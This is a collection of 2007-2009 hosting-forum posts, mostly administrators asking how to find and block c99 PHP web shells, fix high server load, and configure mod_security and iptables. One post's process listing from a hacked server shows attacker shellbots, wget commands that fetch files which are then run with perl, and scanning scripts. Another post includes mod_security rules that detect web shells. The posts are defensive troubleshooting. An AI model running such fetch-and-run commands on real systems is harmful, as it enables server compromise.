C99Shell Hackers Killing Me!
Jun 25, 2007
Guys, I'm tired of fighting these hackers every day! I have about 20 websites, and every day one of them gets hacked! I restore a backup, then another one gets hacked!
That's unbelievable!!!
Those bastards upload their shell scripts to websites via bugs or whatever in PHP files!!
Is there any way to stop these commands?
Can .htaccess help? How?
I talked to my web hosting companies for my websites! ....
Jul 13, 2008
Recently my site was defaced (I own a dedicated server). My server was not touched, but one of the applications I used on the site was exploited to gain access to it.
I have noticed 4 or 5 c99 shells in different locations on my FTP. The site is back online, but it's definitely possible that they have one of these hidden somewhere and that they'll just do it again. I am using CentOS 5.
How can I easily search for these on my box? Can I disable their functionality? Is there a setting I can use in .htaccess or something to make my website safer? I visited one of the scripts, and it said SAFEMODE OFF; how can I at least enable safe mode?
I don't know much of anything about Linux, but I am running cPanel and WHM. I have a guy who manages my box, but he is hard to get hold of sometimes, and I'd like to take care of this ASAP!
Jul 30, 2009
I found these folders in the root
/usr/bin/c99
/usr/include/boost/numeric/interval/detail/c99_rounding_control.hpp
/usr/include/boost/numeric/interval/detail/c99sub_rounding_control.hpp
What are these? Are they normal folders, or did somebody hack our server?
What shall I do?
Jul 1, 2009
I just installed Zen Cart on my web hosting, and a few days later I saw some files named like core1405.php; when I opened one to view it, it was actually the c99shell trojan.
I have deleted all of the core files. Now how can I prevent it from happening again? It is too much work to clean up the hosting server.
Nov 5, 2009
How do I stop scripts like the c99 shell from being installed on the server?
Jun 5, 2007
I installed mod_security from the Addon Modules in cPanel.
When I try phpshell, it works fine without any errors and I can do anything, despite the presence of mod_security protection and disable_functions in php.ini.
Are there particular settings to add to httpd.conf to prevent the phpshell application from running or prevent uploading it to the site?
Sep 3, 2007
The biggest security issue I have with my clients is the PHP c99 shell and similar PHP files; somehow these files get uploaded to the website, and from there they start attacking the websites.
I have also seen that once you upload the c99 PHP file you are able to see the account information (such as a user name) on the same server.
So is there any way to disable this kind of PHP file, or at least disable some functions within the file?
I have been thinking of installing and running an antivirus on the server, but I see that sometimes they upload an encrypted version of the file, so the antivirus can't catch the file as a trojan!
Aug 15, 2008
How can I detect and disable the C99 shell and other shell scripts, e.g. r57 ....
Oct 3, 2007
I want to prevent c99shell scripts from running.
I found this rule to detect URIs for the c99 shell.
#new kit
SecFilterSelective REQUEST_URI "/c99shell.txt"
SecFilterSelective REQUEST_URI "/c99.txt?"
My problem is that the hackers are being more stealthy and calling the script some random name like .../myphpstuff.php. So the URI no longer helps detect it.
How could I detect "c99shell" in the actual file that Apache serves? This assumes that the hacker was successful in installing it.
My box:
Apache 1.3.37
WHM 11.2.0 cPanel 11.11.0-R16983
FEDORA 5 i686 - WHM X v3.1.0
Oct 19, 2007
Is there a way to stop them totally? I.e., even though they are successfully uploaded, I do not want the source to be available to them, etc.?
I mean, is there a way to hide them or not allow them to execute any shell?
Sep 1, 2008
I have a few scripts, but hackers again upload c99 in some way and hack some SMF forums on the server. The server itself they cannot hack, but user accounts they can. So please tell me what you advise?
Jan 17, 2008
I have a VPS with 768MB of RAM, which was always suitable for the websites I'm hosting, as most of them are not popular and none of them got high traffic recently at all.
But for over 2 days the VPS has been eating the RAM and killing all the services (cPanel/httpd/FTP/MySQL..).
I want to know what is causing this and stop it by any means.
I contacted my VPS support and they told me to run "top" in SSH, but I didn't understand anything from what I saw and I didn't know what to do after running that command.
Jun 29, 2008
I remember a long time ago when I used to host on Layered Tech: fast network, good stuff, affordable price. My first server cost me 90 dollars on Layered Tech with about a 20 dollar one-time setup fee.
I visited today after about 2 years and I'm pretty much surprised to see their prices; they are by no means as affordable as they were previously, and the setup fee is now 50 dollars on every server.
With such a large number of servers in their data centers, shouldn't they be able to make them affordable? Yet I have seen the same server in the WHT ads section for a fraction of the price LT expects, not to mention the excessive setup fee.
I'm not complaining, it's their business, but is it really helping them? I can't be the only person feeling this anti-love for Layered Tech. Being a former LT customer, I had no problems with them or their services; I just left after I sold my site and moved to a VPS. But seeing the new prices is a bit shocking.
Jul 14, 2008
The server load averages on my VPS have been very high - escalating to 6.5 in some cases.
The process causing this is:
Pid   Owner  Priority  Cpu %  Mem %  Command
7370  mysql  -10       76.7   3.0    /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/opal.ngwebservers.net.pid --skip-external-locking
My VPS is hosted by Virpus Networks and has these specs:
512MB RAM (1024 burstable), 10GB hard drive space.
8 of these processors on the node:
Processor #1 Vendor: GenuineIntel
Processor #1 Name: Intel(R) Xeon(TM) CPU 2.80GHz
Processor #1 speed: 174.594 MHz
Processor #1 cache size: 2048 KB
No hardware or software changes were implemented on the VPS as far as I am aware.
The MySQL process causing this is:
28993  movies_mybb  localhost  movies_mybb  Query  36  Copying to tmp table  SELECT t.tid, t.dateline, p.edittime, t.subject, f.allowhtml, f.allowmycode, f.allowsmilies, f.allow
This has been going on since I first saw the loads go high...
Mar 10, 2008
I have many servers at vrtservers.net and am happy with their support. And I was planning to become a reseller of theirs.
But the nightmare came the last day..
My main server got a SPAM report from spamcap.net
[url]
The spamcap.net report says my server is running an open proxy and somebody is using it for SPAM.
Before the SPAM report,
I knew about this issue and had fixed it,
so the proxy only ran for many hours. [Check the MRTG graph. [url]
Since the SPAM report,
vrtservers.net put this server offline..
I can understand it.
And I contacted support@vrtservers.net instantly.
And I proceeded with the case at spamcap.net too.
But the nightmare is ....
When I asked "how do I reconnect my servers / when will the case be closed?" to VRTSERVERS.NET,
the vrtservers.net reply to me said the server has been terminated and there is no way to get my data back.
My god ..
All of my server's data has been lost!
vrtservers.net is killing me now!
Nov 25, 2007
I have a VPS with 320MB of RAM. The problem is that SpamAssassin is killing my VPS.
The spamd service was using 50% of memory (+- 150MB of RAM).
Do you think that this is normal RAM usage for spamd?
Jan 31, 2007
Trying to get mod_security installed on my HSphere server; the install goes OK until I try to load rules.
If I just load the exclude.conf rules then PHP sites work; if I also load rules.conf or any other rules then my PHP sites get a 'connection refused' error.
I cannot find anything in the logs, and there is no log written for mod_security.
Here is my modsecurity.conf:
bash-2.05b# cat /etc/modsecurity.conf
<IfModule mod_security.c>
# Only inspect dynamic requests
# (YOU MUST TEST TO MAKE SURE IT WORKS AS EXPECTED)
#SecFilterEngine DynamicOnly
SecFilterEngine On
# Reject requests with status 500
SecFilterDefaultAction "deny,log,status:500"
# Some sane defaults
SecFilterScanPOST On
SecFilterCheckURLEncoding On
SecFilterCheckCookieFormat On
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies On
# enable version 1 (RFC 2965) cookies
SecFilterCookieFormat 1
SecServerResponseToken Off
#If you want to scan the output, uncomment these
#SecFilterScanOutput On
#SecFilterOutputMimeTypes "(null) text/html text/plain"
# Accept almost all byte values
SecFilterForceByteRange 1 255
# Server masking is optional
#fake server banner - NOYB used - no one needs to know what we are using
SecServerSignature "NOYB"
#SecUploadDir /tmp
#SecUploadKeepFiles Off
# Only record the interesting stuff
SecAuditEngine RelevantOnly
SecAuditLog /var/log/audit_log
# You normally won't need debug logging
SecFilterDebugLevel 0
SecFilterDebugLog logs/modsec_debug_log
#And now, the rules
#Remove any of these Include lines you do not use or have rules for.
#First, add in your exclusion rules:
#These MUST come first!
Include /etc/modsecurity/exclude.conf
#Application protection rules
#Include /etc/modsecurity/rules.conf
#Comment spam rules
#Include /etc/modsecurity/blacklist.conf
#Bad hosts, bad proxies and other bad players
##Include /etc/modsecurity/blacklist2.conf
#Bad clients, known bogus useragents and other signs of malware
##Include /etc/modsecurity/useragents.conf
#Known bad software, rootkits and other malware
##Include /etc/modsecurity/rootkits.conf
#Signatures to prevent proxying through your server
#only rule these rules if your server is NOT a proxy
##Include /etc/modsecurity/proxy.conf
#Just in Time Patching for Vulnerable Applications
##Include /etc/modsecurity/jitp.conf
#Google Hacks signatures
##Include /etc/modsecurity/recons.conf
#Include /etc/modsecurity/
</IfModule>
Feb 5, 2007
I have a VPS with 256MB guaranteed RAM, and I have cPanel. A couple of days ago I got to fiddling with a database issue and had phpMyAdmin open for the better part of an hour. So I got to wondering what something like that does to my VPS?
A secondary question: same thing, but on a dedicated server with 1GB RAM?
Nov 2, 2009
Virtuozzo 3.0 is killing the VPSes' /usr/bin/mysqld_safe process but leaving /usr/sbin/mysqld up, which is causing cPanel to be unable to automatically restart MySQL after that.
Jan 28, 2008
From top:
12478 root 35 19 2004 680 308 R 39 0.0 8:54.95 gzip
It has been using anywhere from 30-50% of my CPU for nearly 10 min now, but no memory usage.
Any ideas? Should I kill the PID?
The site is running pretty slow as a result of this.
Dec 15, 2007
24 hours ago something weird happened..
For some reason httpd is causing high server load.
ATM: 22:44:17 up 22:17, 2 users, load average: 6.23, 6.12, 8.88
It will keep going up, and httpd needs to be restarted when the server load reaches 30.
The traffic on the server is normal; no changes were made on the server.
Dec 7, 2007
Opt 248
3GB RAM
250GB SATA II
I have a fairly unique problem. My server runs great 95% of the time; loads average under 1. However, backups have become a server killer. I use the cPanel scheduled backup in the early morning hours. The reason backups kill my server is that I have 300,000+ (and counting) images in a directory. They are all small PNGs generated by LaTeX. It takes my server several hours to back up the images. I usually even have to stop Apache to free up some power. This problem is only going to get worse as I get more images. Maybe I could upgrade the proc or upgrade to a faster HD? That would be costly; hopefully not.
Should I hire a professional backup service? Costly, and would that help? Or is there a way of storing the images, or something about the cpbackup I am doing wrong?
Feb 5, 2008
if it was possible to kill a server running WHMCS by executing the cron.php via cronjob on a remote server once every minute.
I just wanted to see if this was potentially harmful, so I can submit it to Matt without sounding like an idiot...
Oct 4, 2007
One of these rules is causing name server lookups to fail, but I can't seem to figure out which one, can anyone spot the problem?
[root@example ~]# iptables -L -n
Chain INPUT (policy DROP)
target prot opt source destination
ACCEPT all -- 0.0.0.0/0 0.0.0.0/0
INVDROP all -- 0.0.0.0/0 0.0.0.0/0 state INVALID
INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x3F/0x00
INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x3F/0x3F
INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x03/0x03
INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x06/0x06
INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x05/0x05
INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x11/0x01
INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x18/0x08
INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x30/0x20
ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 state RELATED,ESTABLISHED
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:20
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:21
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:22
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:25
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:53
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:80
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:110
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:143
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:443
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:465
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:953
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:993
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:995
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:10023
ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 state NEW udp dpt:20
ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 state NEW udp dpt:21
ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 state NEW udp dpt:53
ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 state NEW udp dpt:953
ACCEPT icmp -- 0.0.0.0/0 0.0.0.0/0 state NEW icmp type 8
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spt:53 dpt:53
ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 udp spt:53 dpt:53
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spt:53 dpts:1024:65535
ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 udp spt:53 dpts:1024:65535
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spts:1024:65535 dpt:53
ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 udp spts:1024:65535 dpt:53
LOGDROPIN all -- 0.0.0.0/0 0.0.0.0/0
Chain FORWARD (policy DROP)
target prot opt source destination
Chain OUTPUT (policy DROP)
target prot opt source destination
INVDROP all -- 0.0.0.0/0 0.0.0.0/0 state INVALID
INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x3F/0x00
INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x3F/0x3F
INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x03/0x03
INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x06/0x06
INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x05/0x05
INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x11/0x01
INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x18/0x08
INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x30/0x20
ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 state RELATED,ESTABLISHED
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:20
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:21
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:22
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:25
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:53
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:80
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:110
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:113
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:443
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:953
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:10023
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:9999
ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 state NEW udp dpt:20
ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 state NEW udp dpt:21
ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 state NEW udp dpt:53
ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 state NEW udp dpt:113
ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 state NEW udp dpt:123
ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 state NEW udp dpt:953
ACCEPT icmp -- 0.0.0.0/0 0.0.0.0/0 state NEW icmp type 8
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spt:53 dpt:53
ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 udp spt:53 dpt:53
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spts:1024:65535 dpt:53
ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 udp spts:1024:65535 dpt:53
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spt:53 dpts:1024:65535
ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 udp spt:53 dpts:1024:65535
LOGDROPOUT all -- 0.0.0.0/0 0.0.0.0/0
Chain INVDROP (18 references)
target prot opt source destination
DROP all -- 0.0.0.0/0 0.0.0.0/0
Chain LOGDROPIN (1 references)
target prot opt source destination
DROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:67
DROP udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:67
DROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:68
DROP udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:68
DROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:111
DROP udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:111
DROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:113
DROP udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:113
DROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpts:135:139
DROP udp -- 0.0.0.0/0 0.0.0.0/0 udp dpts:135:139
DROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:445
DROP udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:445
DROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:513
DROP udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:513
DROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:520
DROP udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:520
LOG tcp -- 0.0.0.0/0 0.0.0.0/0 limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *TCP_IN Blocked* '
LOG udp -- 0.0.0.0/0 0.0.0.0/0 limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *UDP_IN Blocked* '
LOG icmp -- 0.0.0.0/0 0.0.0.0/0 limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *ICMP_IN Blocked* '
DROP all -- 0.0.0.0/0 0.0.0.0/0
Chain LOGDROPOUT (1 references)
target prot opt source destination
LOG tcp -- 0.0.0.0/0 0.0.0.0/0 limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *TCP_OUT Blocked* '
LOG udp -- 0.0.0.0/0 0.0.0.0/0 limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *UDP_OUT Blocked* '
LOG icmp -- 0.0.0.0/0 0.0.0.0/0 limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *ICMP_OUT Blocked* '
DROP all -- 0.0.0.0/0 0.0.0.0/0
Jul 24, 2007
My nobody_check is killing a process that seems to be OK, but I'm not sure. The process is running /usr/bin/perl-bin, which I have never heard of. I thought it was /usr/bin/perl.
Should I be concerned? Again, I don't know what /perl-bin is.
Process ID: 28457 has been killed
Restuls for PID: 28457
total 0
dr-xr-xr-x 3 nobody nobody 0 Jul 23 17:00 .
dr-xr-xr-x 201 root root 0 Jun 29 11:59 ..
dr-xr-xr-x 2 root root 0 Jul 23 17:00 attr
-r-------- 1 root root 0 Jul 23 17:00 auxv
-r--r--r-- 1 root root 0 Jul 23 17:00 cmdline
lrwxrwxrwx 1 root root 0 Jul 23 17:00 cwd -> /
-r-------- 1 root root 0 Jul 23 17:00 environ
lrwxrwxrwx 1 root root 0 Jul 23 17:00 exe -> /usr/bin/perl-bin
dr-x------ 2 root root 0 Jul 23 17:00 fd
-rw-r--r-- 1 root root 0 Jul 23 17:00 loginuid
-r-------- 1 root root 0 Jul 23 17:00 maps
-rw------- 1 root root 0 Jul 23 17:00 mem
-r--r--r-- 1 root root 0 Jul 23 17:00 mounts
lrwxrwxrwx 1 root root 0 Jul 23 17:00 root -> /
-r--r--r-- 1 root root 0 Jul 23 17:00 stat
-r--r--r-- 1 root root 0 Jul 23 17:00 statm
-r--r--r-- 1 root root 0 Jul 23 17:00 status
dr-xr-xr-x 3 root root 0 Jul 23 17:00 task
-r--r--r-- 1 root root 0 Jul 23 17:00 wchan
Netstat:
tcp 0 0 127.0.0.1:783 127.0.0.1:40957 CLOSE_WAIT 28457/spamd child
udp 0 0 xx.xxx.xxx.xx:41008 216.52.190.1:53 ESTABLISHED 28457/spamd child
unix 3 [ ] STREAM CONNECTED 120878416 28457/spamd child
unix 2 [ ] DGRAM 120872220 28457/spamd child
unix 2 [ ] STREAM CONNECTED 120847759 28457/spamd child
unix 2 [ ] STREAM CONNECTED 120832442 28457/spamd child
Environ:
Process ID: 23944 has been killed
Restuls for PID: 23944
total 0
dr-xr-xr-x 3 nobody nobody 0 Jul 23 16:55 .
dr-xr-xr-x 206 root root 0 Jun 29 11:59 ..
dr-xr-xr-x 2 root root 0 Jul 23 17:00 attr
-r-------- 1 root root 0 Jul 23 17:00 auxv
-r--r--r-- 1 root root 0 Jul 23 16:55 cmdline
lrwxrwxrwx 1 root root 0 Jul 23 17:00 cwd -> /
-r-------- 1 root root 0 Jul 23 17:00 environ
lrwxrwxrwx 1 root root 0 Jul 23 16:55 exe -> /usr/bin/perl-bin
dr-x------ 2 root root 0 Jul 23 17:00 fd
-rw-r--r-- 1 root root 0 Jul 23 17:00 loginuid
-r-------- 1 root root 0 Jul 23 17:00 maps
-rw------- 1 root root 0 Jul 23 17:00 mem
-r--r--r-- 1 root root 0 Jul 23 17:00 mounts
lrwxrwxrwx 1 root root 0 Jul 23 17:00 root -> /
-r--r--r-- 1 root root 0 Jul 23 16:55 stat
-r--r--r-- 1 root root 0 Jul 23 16:55 statm
-r--r--r-- 1 root root 0 Jul 23 16:55 status
dr-xr-xr-x 3 root root 0 Jul 23 17:00 task
-r--r--r-- 1 root root 0 Jul 23 17:00 wchan
Netstat:
tcp 1 0 127.0.0.1:783 127.0.0.1:40955 CLOSE_WAIT 23944/spamd child
udp 0 0 xx.xx.xxx.xxx:55606 216.52.190.1:53 ESTABLISHED 23944/spamd child
unix 3 [ ] STREAM CONNECTED 120847760 23944/spamd child
unix 2 [ ] STREAM CONNECTED 120832442 23944/spamd child
unix 2 [ ] DGRAM 120677444 23944/spamd child
Environ:
Jan 21, 2007
Hackers these days don't hack for money; a lot of the time they hack for pride and the lame fun in it.
Look at this website:
[url]
Dec 27, 2007
I have been constantly battling hackers over the last week, and I have to admit I'm not really sure what it is that is letting them in, but they're getting in... the processes all run as "apache", so clearly it's the web server somehow.
I've changed the SSH port, have disabled cron for the apache user and have set PHP safe_mode on the site I think might be to blame, but still no luck.
Logged in this morning to be greeted by this...
[root@s15247463 httpdocs]# ps -fe | grep apache
apache 2889 2220 1 Dec26 ? 00:18:36 /usr/sbin/httpd
apache 2891 2220 0 Dec26 ? 00:00:00 /usr/sbin/httpd
apache 2892 2220 0 Dec26 ? 00:00:02 /usr/sbin/httpd
apache 2893 2220 0 Dec26 ? 00:00:02 /usr/sbin/httpd
apache 2894 2220 0 Dec26 ? 00:00:00 /usr/sbin/httpd
apache 2895 2220 0 Dec26 ? 00:00:05 /usr/sbin/httpd
apache 2896 2220 0 Dec26 ? 00:00:02 /usr/sbin/httpd
apache 14664 2220 0 Dec26 ? 00:00:03 /usr/sbin/httpd
apache 32714 1 0 Dec26 ? 00:00:02 /apache/bin/httpd
apache 32719 1 0 Dec26 ? 00:00:02 /apache/bin/httpd
apache 19751 2894 0 Dec26 ? 00:00:00 [sh] <defunct>
apache 19764 1 23 Dec26 ? 03:31:35 shellbot
apache 28642 2220 0 Dec26 ? 00:00:04 /usr/sbin/httpd
apache 28662 2891 0 Dec26 ? 00:00:00 [sh] <defunct>
apache 28666 1 22 Dec26 ? 03:23:10 shellbot
apache 29532 2220 0 Dec26 ? 00:00:01 /usr/sbin/httpd
apache 29933 2220 0 Dec26 ? 00:07:18 /usr/sbin/httpd
apache 20833 2893 0 Dec26 ? 00:00:00 [sh] <defunct>
apache 20838 1 13 Dec26 ? 01:21:35 [httpds]
apache 20847 29532 0 Dec26 ? 00:00:00 [sh] <defunct>
apache 20853 1 13 Dec26 ? 01:21:33 [httpds]
apache 20870 2220 0 Dec26 ? 00:00:02 /usr/sbin/httpd
apache 20879 2892 0 Dec26 ? 00:00:00 [sh] <defunct>
apache 20884 1 13 Dec26 ? 01:21:28 [httpds]
apache 20887 2896 0 Dec26 ? 00:00:00 [sh] <defunct>
apache 20892 1 13 Dec26 ? 01:21:16 [httpds]
apache 20895 2220 0 Dec26 ? 00:00:01 /usr/sbin/httpd
apache 20896 2220 0 Dec26 ? 00:00:02 /usr/sbin/httpd
apache 20901 2220 0 Dec26 ? 00:00:02 /usr/sbin/httpd
apache 21445 2220 0 Dec26 ? 00:00:01 /usr/sbin/httpd
apache 1875 1 0 00:01 ? 00:00:00 [httpds]
apache 2237 1 0 00:14 ? 00:00:00 ./mocks start
apache 5465 20895 0 00:23 ? 00:00:00 [sh] <defunct>
apache 5477 1 6 00:23 ? 00:24:48 shellbot
apache 10110 14664 0 01:00 ? 00:00:00 [sh] <defunct>
apache 10142 1 11 01:00 ? 00:44:09 shellbot
apache 10537 2220 0 01:27 ? 00:00:01 /usr/sbin/httpd
apache 13780 1 0 02:28 ? 00:00:00 [httpds]
apache 13781 13780 0 02:28 ? 00:00:00 sh -c wget [url] -O [url]
apache 13784 1 0 02:28 ? 00:00:00 [httpds]
apache 13785 13784 0 02:28 ? 00:00:00 sh -c wget[url] -O [url]
apache 13788 1 0 02:28 ? 00:00:00 [httpds]
apache 13789 13788 0 02:28 ? 00:00:00 sh -c wget [url] -O [url]
apache 13792 1 0 02:28 ? 00:00:00 [httpds]
apache 13793 13792 0 02:28 ? 00:00:00 sh -c wget [url] -O [url]
apache 13798 13789 0 02:29 ? 00:00:00 perl test.txt
apache 13802 13781 0 02:29 ? 00:00:00 perl test.txt
apache 13806 13793 0 02:29 ? 00:00:00 perl test.txt
apache 13810 13785 0 02:29 ? 00:00:00 perl test.txt
apache 22282 2220 0 03:40 ? 00:00:00 /usr/sbin/httpd
apache 22434 20896 0 03:51 ? 00:00:00 [sh] <defunct>
apache 22442 1 10 03:51 ? 00:20:33 [httpd]
apache 22513 21445 0 03:55 ? 00:00:00 [perl] <defunct>
apache 22515 1 0 03:55 ? 00:00:00 /usr/local/apache/bin/nscan -DSSL
apache 22552 2220 0 03:58 ? 00:00:00 /usr/sbin/httpd
apache 23183 1 0 04:03 ? 00:00:48 /usr/local/apache/bin/nscan -DSSL
apache 23187 1 0 04:03 ? 00:00:47 /usr/local/apache/bin/nscan -DSSL
apache 3606 2220 0 04:52 ? 00:00:00 /usr/sbin/httpd
apache 27716 1 0 06:54 ? 00:00:00 [httpd]
apache 27720 1 0 06:54 ? 00:00:00 ./php
apache 28140 1 0 07:06 ? 00:00:00 /bin/sh ./mass 139
apache 28299 28140 0 07:12 ? 00:00:00 /bin/bash ./a 139.1
apache 28302 28299 9 07:12 ? 00:00:20 /bin/bash 139.1 22
Mar 12, 2007
We are rookies, and we are being attacked by hackers for the second time in as many weeks. I can see them in the shell right now on multiple servers. I cannot remember, in all the excitement, how to take away their root access. How do I stop them from doing any more damage?
May 18, 2007
This is the site whose banners appeared on my kids' site after the hack,
Apr 12, 2007
So we've got a client set up with 2 domains: 1 main and 1 secondary.
The secondary domain is a 301 redirect with masking through GoDaddy. The reason for the masking is that we need the domain name to stay the same after the redirect. (So people who come in on DomainB will only see DomainB in the URL bar.)
The problem: GoDaddy uses a "zero frame" element to implement the masking, and it's messing up the display of our site.
Note: The display only screws up in IE.
Primary domain: www.BristolCountyWomensJournal.com --> (This works fine.)
301 domain: www.WomensJournals.com --> (Check out the messy background!)
Anyone know of alternatives to Domain Masking?
Jan 8, 2009
We're running on Linux/Apache/MySQL/RoR and have a number of cron jobs that run throughout the day on our server. We've been noticing lately that at certain times of the day the site becomes really slow. When I'm online with my engineers I can mention this to them and they can check and see and say "Oh yeah, it's job XYZ that's spiking the server load."
That's great, but much of the time when I notice the sluggishness my developers are offline (we're in different time zones). I'm wondering if there's a fairly easy way to track this when they're not online, so we can say "Yup, last night at 10 PM your time when you noticed that, it was job ABC." There has to be something that allows you to do this, right?